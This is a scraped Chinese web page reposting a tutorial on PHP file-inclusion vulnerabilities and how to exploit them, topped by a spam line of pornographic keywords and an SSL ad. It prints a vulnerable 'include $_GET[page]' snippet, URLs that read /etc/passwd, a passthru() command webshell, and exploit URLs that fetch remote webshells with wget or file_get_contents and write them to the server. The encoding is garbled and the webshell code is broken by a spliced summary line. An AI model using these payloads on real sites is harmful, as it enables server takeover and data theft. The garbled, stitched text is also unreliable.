日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢(xún)
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案
PHP文件包含漏洞原理分析和利用方法

本文章簡(jiǎn)單摘要:一、涉及到的危險(xiǎn)函數(shù)〔include(),require()和include_once(),require_once()〕include()&&require()語(yǔ)句:包括并運(yùn)行指定文件。這兩種結(jié)構(gòu)除了在如何處理失敗之外完全一樣。include()產(chǎn)生一個(gè)警告而require()則導(dǎo)致一個(gè)致命錯(cuò)誤。換句話說(shuō),如果你想在遇到丟失文件時(shí)停止處理頁(yè)面就用require()。include()就不是這樣。

泊頭ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場(chǎng)景,ssl證書(shū)未來(lái)市場(chǎng)廣闊!成為創(chuàng)新互聯(lián)的ssl證書(shū)銷(xiāo)售渠道,可以享受市場(chǎng)價(jià)格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:18982081108(備注:SSL證書(shū)合作)期待與您的合作!

一、涉及到的危險(xiǎn)函數(shù)〔include(),require()和include_once(),require_once()〕

include() && require()語(yǔ)句:包括并運(yùn)行指定文件。

這兩種結(jié)構(gòu)除了在如何處理失敗之外完全一樣。include() 產(chǎn)生一個(gè)警告而 require() 則導(dǎo)致一個(gè)致命錯(cuò)誤。換句話說(shuō),如果你想在遇到丟失文件時(shí)停止處理頁(yè)面就用 require()。include() 就不是這樣,腳本會(huì)繼續(xù)運(yùn)行。

如果"allow_url_fopen"在 PHP 中被激活(默認(rèn)配置),也可以用 URL(通過(guò) HTTP 或者其它支持的封裝協(xié)議)而不是本地文件來(lái)指定要被包括的文件。如果目標(biāo)服務(wù)器將目標(biāo)文件作為 PHP 代碼解釋?zhuān)瑒t可以用適用于 HTTP GET 的 URL 請(qǐng)求字符串來(lái)向被包括的文件傳遞變量。
詳細(xì)參考:http://www.phpe.net/manual/function.include.php

require_once()?。ΓΑnclude_once()
require_once()和include_once() 語(yǔ)句在腳本執(zhí)行期間包括并運(yùn)行指定文件。此行為和 require() 語(yǔ)句類(lèi)似,唯一區(qū)別是如果該文件中的代碼已經(jīng)被包括了,則不會(huì)再次包括。適用于在腳本執(zhí)行期間同一個(gè)文件有可能被包括超過(guò)一次的情況下,你想確保它只被包括一次以避免函數(shù)重定義,變量重新賦值等問(wèn)題。

詳細(xì)參考:http://www.phpe.net/manual/function.require-once.php

二、為什么要包含文件

程序員寫(xiě)程序的時(shí)候,不喜歡干同樣的事情,也不喜歡把同樣的代碼(比如一些公用的函數(shù))寫(xiě)幾次,于是就把需要公用的代碼寫(xiě)在一個(gè)單獨(dú)的文件里面,比如 share.php,而后在其它文件進(jìn)行包含調(diào)用。在php里,我們就是使用上面列舉的那幾個(gè)函數(shù)來(lái)達(dá)到這個(gè)目的的,它的工作流程:如果你想在 main.php里包含share.php,我將這樣寫(xiě)include("share.php")就達(dá)到目的,然后就可以使用share.php中的函數(shù)了,像這個(gè)寫(xiě)死需要包含的文件名稱(chēng)的自然沒(méi)有什么問(wèn)題,也不會(huì)出現(xiàn)漏洞,那么問(wèn)題到底是出在哪里呢?

有的時(shí)候可能不能確定需要包含哪個(gè)文件,比如先來(lái)看下面這個(gè)文件index.php的代碼:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------

       if ($_GET[page]) {
       include $_GET[page];
       } else {
       include "home.php";
       }

很正常的一段PHP代碼,它是怎么運(yùn)作的呢?這里面涉及到$_GET的意義,我就不打算講了(要不又能寫(xiě)篇HTTP的文章了),如果你還不了解GET,POST,等,那么你需要再Google一些相關(guān)的資料好好補(bǔ)一補(bǔ)了。

上面這段代碼的使用格式可能是這樣的:http://www.520jsj.com/php/index.php?page=main.php或者h(yuǎn)ttp: //www.520jsj.com/php/index.php?page=downloads.php,結(jié)合上面代碼,簡(jiǎn)單說(shuō)下怎么運(yùn)作的:

1.提交上面這個(gè)URL,在index.php中就取得這個(gè)page的值($_GET[page])。
2.判斷$_GET[page]是不是空,若不空(這里是main.php)就用include來(lái)包含這個(gè)文件。
3.若$_GET[page]空的話就執(zhí)行else,來(lái)include home.php 這個(gè)文件。

三、為什么會(huì)產(chǎn)生漏洞

你也許要說(shuō),這樣很好呀,可以按照URL來(lái)動(dòng)態(tài)包含文件,多么方便呀,怎么產(chǎn)生漏洞的呢?問(wèn)題的答案是:我們不乖巧,我們總喜歡和別人不一樣,我們不會(huì)按照他的鏈接來(lái)操作,我們可能想自己寫(xiě)想包含(調(diào)用)的文件,比如我們會(huì)隨便的打入下面這個(gè)URL:http: //www.1steam.cn/php/index.php?page=hello.php。然后我們的index.php程序就傻傻按照上面我們說(shuō)得步驟去執(zhí)行:取page為hello.php,然后去include(hello.php),這時(shí)問(wèn)題出現(xiàn)了,因?yàn)槲覀儾](méi)有hello.php這個(gè)文件,所以它 include的時(shí)候就會(huì)報(bào)警告,類(lèi)似下列信息:

Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3

注意上面的那個(gè)Warning就是找不到我們指定的hello.php文件,也就是包含不到我們指定路徑的文件;而后面的警告是因?yàn)榍懊鏇](méi)有找到指定文件,所以包含的時(shí)候就出警告了。

四、怎么利用

上面可以看到,問(wèn)題出現(xiàn)了,那么我們?cè)趺蠢眠@樣的漏洞呢,利用方法其實(shí)很多,但是實(shí)質(zhì)上都是差不多的,我這里說(shuō)三個(gè)比較常見(jiàn)的利用方法:

1.包含讀出目標(biāo)機(jī)上其它文件

由前面我們可以看到,由于對(duì)取得的參數(shù)page沒(méi)有過(guò)濾,于是我們可以任意指定目標(biāo)主機(jī)上的其它敏感文件,例如在前面的警告中,我們可以看到暴露的絕對(duì)路徑(vhost/wwwroot/php/),那么我們就可以多次探測(cè)來(lái)包含其它文件,比如指定URL為:http://www.520jsj.com/php/index.php?page=./txt.txt可以讀出當(dāng)前路徑下的txt.txt文件,也可以使用../../進(jìn)行目錄跳轉(zhuǎn)(在沒(méi)過(guò)濾../的情況下);也可以直接指定絕對(duì)路徑,讀取敏感的系統(tǒng)文件,比如這個(gè)URL:http://www.520jsj.com/php/index.php?page=/etc/passwd,如果目標(biāo)主機(jī)沒(méi)有對(duì)權(quán)限限制的很?chē)?yán)格,或者啟動(dòng)Apache的權(quán)限比較高,是可以讀出這個(gè)文件內(nèi)容的。否則就會(huì)得到一個(gè)類(lèi)似于:open_basedir restriction in effect.的Warning。

2.包含可運(yùn)行的PHP木馬

如果目標(biāo)主機(jī)的"allow_url_fopen"是激活的(默認(rèn)是激活的,沒(méi)幾個(gè)人會(huì)修改),我們就可以有更大的利用空間,我們可以指定其它URL上的一個(gè)包含PHP代碼的webshell來(lái)直接運(yùn)行,比如,我先寫(xiě)一段運(yùn)行命令的PHP代碼(加了注釋?zhuān)瑧?yīng)該看得懂),如下保存為cmd.txt(后綴不重要,只要內(nèi)容為PHP格式就可以了)。

if (get_magic_quotes_gpc())
{$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉轉(zhuǎn)義字符(可去掉字符串中的反斜線字符)
ini_set("max_execution_time",0); //設(shè)定針對(duì)這個(gè)文件的執(zhí)行時(shí)間,0為不限制.
echo "
1.S.T
";      

本文章簡(jiǎn)單摘要://打印的返回的開(kāi)始行提示信息passthru($_REQUEST["cmd"]);   //運(yùn)行cmd指定的命令echo"1.S.T";      //打印的返回的結(jié)束行提示信息?>以上這個(gè)文件的作用就是接受cmd指定的命令,并調(diào)用passthru函數(shù)執(zhí)行,把內(nèi)容返回在1.S.T之間。把這個(gè)文件保存到我們主機(jī)的服務(wù)器上(可以是不支持PHP的主機(jī)),只要能通過(guò)HTTP訪問(wèn)到就可以了。

//打印的返回的開(kāi)始行提示信息
passthru($_REQUEST["cmd"]);   //運(yùn)行cmd指定的命令
echo "
1.S.T
";      //打印的返回的結(jié)束行提示信息
?>

以上這個(gè)文件的作用就是接受cmd指定的命令,并調(diào)用passthru函數(shù)執(zhí)行,把內(nèi)容返回在1.S.T之間。把這個(gè)文件保存到我們主機(jī)的服務(wù)器上(可以是不支持PHP的主機(jī)),只要能通過(guò)HTTP訪問(wèn)到就可以了,例如地址如下:http://www.520jsj.com/cmd.txt,然后我們就可以在那個(gè)漏洞主機(jī)上構(gòu)造如下URL來(lái)利用了:http://www.520jsj.com/php/index.php?page=http://www.1ster.cn/cmd.txt?cmd=ls,其中cmd后面的就是你需要執(zhí)行的命令,其它常用的命令(以*UNIX為例)如下:

Quote:
ll 列目錄、文件(相當(dāng)于Windows下dir)
pwd 查看當(dāng)前絕對(duì)路徑
id whoami 查看當(dāng)前用戶
wget 下載指定URL的文件

等等其它的,你主機(jī)去BAIDU找吧,就不列舉了。
上面的方法就是得到一個(gè)Webshell了(雖然這個(gè)PHP文件不在目標(biāo)機(jī)上,但是它確實(shí)是個(gè)Webshell,不是么?呵呵)

3.包含一個(gè)創(chuàng)建文件的PHP文件

也許有的人認(rèn)為還是得到目標(biāo)機(jī)上的一個(gè)真實(shí)的Webshell比較放心,萬(wàn)一哪天人家發(fā)現(xiàn)這兒個(gè)包含漏洞修補(bǔ)了,我們就不能再遠(yuǎn)程包含得到上面的那個(gè)"偽"Webshell了,不是么?可以理解這個(gè)心態(tài),我們繼續(xù)。得到一個(gè)真實(shí)的Webshell,我們也說(shuō)兩種常見(jiàn)的方法:

1)使用wget之類(lèi)的命令來(lái)下載一個(gè)Webshell

這個(gè)比較簡(jiǎn)單,也很常用,在上面我們得到的那個(gè)偽webshell中,我們可以執(zhí)行命令,那么我們也可以調(diào)用系統(tǒng)中的一個(gè)很厲害的角色,wget,這個(gè)命令的強(qiáng)大你可以google下,參數(shù)一大堆,絕對(duì)搞暈?zāi)?,呵呵,我們不需要那么?fù)雜,我們就使用一個(gè)-O(--output-document=FILE,把文檔寫(xiě)到FILE文件中) 就可以了,呵呵。

前提是你在按照前面的步驟放一個(gè)包含PHP代碼的Webshell在一個(gè)可以通過(guò)HTTP或者FTP等可以訪問(wèn)的地方,比如:http://www.520jsj.com/1stphp.txt,這個(gè)文件里寫(xiě)的就是Webshell的內(nèi)容。然后我們?cè)谇懊娴玫降膫蜽ebshell中執(zhí)行如下的URL:http://www.520jsj.com/php/index.php?page=http://www.520jsj.com/cmd.txt?cmd=wget http://www.1ster.cn/1stphp.txt -O 1stphp.php,如果當(dāng)前目錄可寫(xiě),就能得到一個(gè)叫做1stphp.php的Webshell了;如果當(dāng)前目錄不可寫(xiě),還需要想其它的辦法。

2)使用文件來(lái)創(chuàng)建

前面的wget可能會(huì)遇到當(dāng)前目錄不能寫(xiě)的情況;或者目標(biāo)主機(jī)禁用了(或者沒(méi)裝)這個(gè)命令,我們又需要變通一下了,我們可以結(jié)合前面的包含文件漏洞來(lái)包含一個(gè)創(chuàng)建文件(寫(xiě)文件)的PHP腳本,內(nèi)容如下:

$f=file_get_contents("http://www.520jsj.com/1stphp.txt";); //打開(kāi)指定路徑的文件流
$ff=fopen("./upload/1st.php","a");     //尋找一個(gè)可以的目錄,創(chuàng)建一個(gè)文件
fwrite ($ff,$f);  //把前面打開(kāi)的文件流寫(xiě)到創(chuàng)建的文件里
fclose($ff);    //關(guān)閉保存文件
?>

還是寫(xiě)入我們上面用wget下載的那個(gè)php文件,但是我們改進(jìn)了方法,用PHP腳本來(lái)實(shí)現(xiàn),可以使用上面的cmd.php?cmd=ll查找可以寫(xiě)的目錄,比如這里的upload,然后把文件創(chuàng)建在這個(gè)目錄下:./upload/1st.php。然后就得到我們的Webshell了。


當(dāng)前名稱(chēng):PHP文件包含漏洞原理分析和利用方法
鏈接分享:http://www.5511xx.com/article/dpcejeo.html